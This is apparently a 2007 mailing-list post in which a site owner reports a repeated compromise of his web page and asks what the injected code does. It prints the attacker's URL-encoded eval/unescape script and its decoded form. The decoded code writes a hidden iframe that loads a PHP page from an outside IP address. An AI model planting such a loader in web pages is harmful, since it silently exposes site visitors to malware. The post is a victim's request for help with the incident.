[ale] I've been hacked!
Jim Lynch
ale_nospam at fayettedigital.com
Wed Nov 21 06:57:14 EST 2007
Last summer I received notification from Google that a web page on one
of my web hosting accounts was infected with some sort of malware bug.
This account only has ftp access so I changed the password for the one
and only ftp account and removed the offending code from my index.html
file. I also added a cron job to another site to compare a good
index.html with the one on the site that had been hacked in case they
came back.
They did.
Today I received a message that said the compare failed and found the
following at the top of the body in my index.html file:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
</script>
That script, unescaped looks like:
window.status='Done';document.write('<iframe name=7b73
src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\'
width=351 height=133 style=\'display: none\'></iframe>'
Has anyone seen anything like this before? I wonder what sort of evil
function it might perform?
I also wonder how they got access the second time? I went through the
cgi scripts on that system to be sure they were mine. There aren't any
php files on the system.
I attempted to look up the ip address but nslookup said it didn't exist,
however it pings and the index.html file from it is the default apache2
index file. I suspect that system has been hacked as well.
Note the incident from last Summer was a different one.
Thanks,
Jim.
More information about the Ale
mailing list